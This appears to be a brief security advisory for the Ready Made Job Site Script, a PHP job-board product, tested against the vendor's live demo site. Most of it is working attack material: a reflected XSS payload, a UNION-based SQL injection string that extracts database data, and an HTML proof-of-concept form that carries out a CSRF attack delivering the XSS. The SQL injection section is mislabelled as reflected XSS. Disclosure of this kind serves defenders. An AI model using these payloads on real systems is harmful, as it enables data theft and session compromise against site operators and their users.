Ready Made Job Site Script SQLi/XSS/CSRF
ADLab of Venustech
Well, when I pentest the official demo site of Ready Made Job Site Script, I found some vulnerabilities here.
XSS:
There're some reflect-xss in this system, for example:
http://phpscriptsmall.biz/demo/onlinejobsearch/job
POST key para "keyword":
keyword='"><svg/onload=alert(/xss/)><'"&location_name[]=
SQLi:
There're some reflect-xss in this system, for example:
http://phpscriptsmall.biz/demo/onlinejobsearch/job
POST key para "location_name[]":
keyword=666&location_name[]=-1813) UNION ALL SELECT 6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,CONCAT(0x716a707071,0x4b7052435851504b686a5571556e74777a5a43616a5742614b4e466b7a424a6f4b6b59484a566a51,0x716b6b6b71),6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208#
You can see, we can obtain the current data user or more sensitive data now!
CSRF
With the csrf bug, we can cheat the user to change some important content ,or get post reflect-xss attack here.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://phpscriptsmall.biz/demo/onlinejobsearch/job" method="POST">
<input type="hidden" name="keyword" value="'"><svg/onload=alert(/xss/)><'"" />
<input type="hidden" name="location_name[]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


